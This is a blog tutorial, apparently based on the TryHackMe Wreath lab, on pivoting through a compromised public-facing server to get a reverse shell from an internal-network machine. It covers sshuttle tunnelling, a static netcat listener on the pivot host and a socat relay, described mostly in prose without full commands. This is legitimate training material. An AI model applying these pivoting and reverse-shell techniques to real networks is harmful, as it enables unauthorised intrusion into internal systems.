In this blog, you will learn different ways to get a reverse shell from a vulnerable machine in an internal network by pivoting through an external compromised machine. This challenge is also part of the wreath network from Tryhackme which you could check for further study.
How to get a reverse shell from an internal network?
First, let’s see what’s the issue in getting a reverse shell from a vulnerable machine in an internal network.
The network is similar to the image shown below.
The issue here is there isn’t any route to reach the machines in the internal network for the attacker and vice-versa.
The only way we could think of is, compromising the intermediate public-facing server and then using it in some way to compromise a vulnerable machine in an internal network.
Let’s skip the part about compromising the server and from here we can have 2 methods based on whether we have SSH access to the server or not.
Reverse shell with SSH access:
So if we have SSH credentials for the server(only Linux) then we can use a tool called shuttle which uses an SSH connection to create a tunnelled proxy that acts like a new interface. In short, it simulates a VPN, allowing us to route our traffic through the proxy without the use of proxychains (or an equivalent).
With this, we can access any machine in the internal network with ease.
-r — remote server to which we have ssh access
-N — can be used to automatically detect the subnet to pivot
10.200.48.0/24 — subnet to access through pivoting
If you think could we use ping to check whether we have access to the machine in the internal network then it’s a great question.
And the answer to that will be no because here TCP sessions are proxied and not packets. For further detailed explanation, do refer to the documentation. Port scanning too doesn’t prove to be reliable as these sends packet to gather information about the target.
So to gain knowledge about our target inside the internal network we have to use static binary of Nmap or use tools installed in the compromised server(Living off the land technique).
Now to get the reverse shell we have 2 ways:
- Setting up a simple listener using netcat static binary in the compromised server .
- Setting up relay agent like socat to get back the shell to our machine.
In the first method , we upload static copy of netcat to the server and send reverse shell payload with IP and PORT of the netcat listener. This works because the server has a route to the internal network meaning they could communicate with one another. So now we can get shell to the vulnerable machine in the internal network in the compromised server.
We were able to access the IP 10.200.48.150 because of the pivoting we done using sshuttle.
In the second method instead of setting up netcat listener in the server we set up relay agent using socat to forward the connection to our system.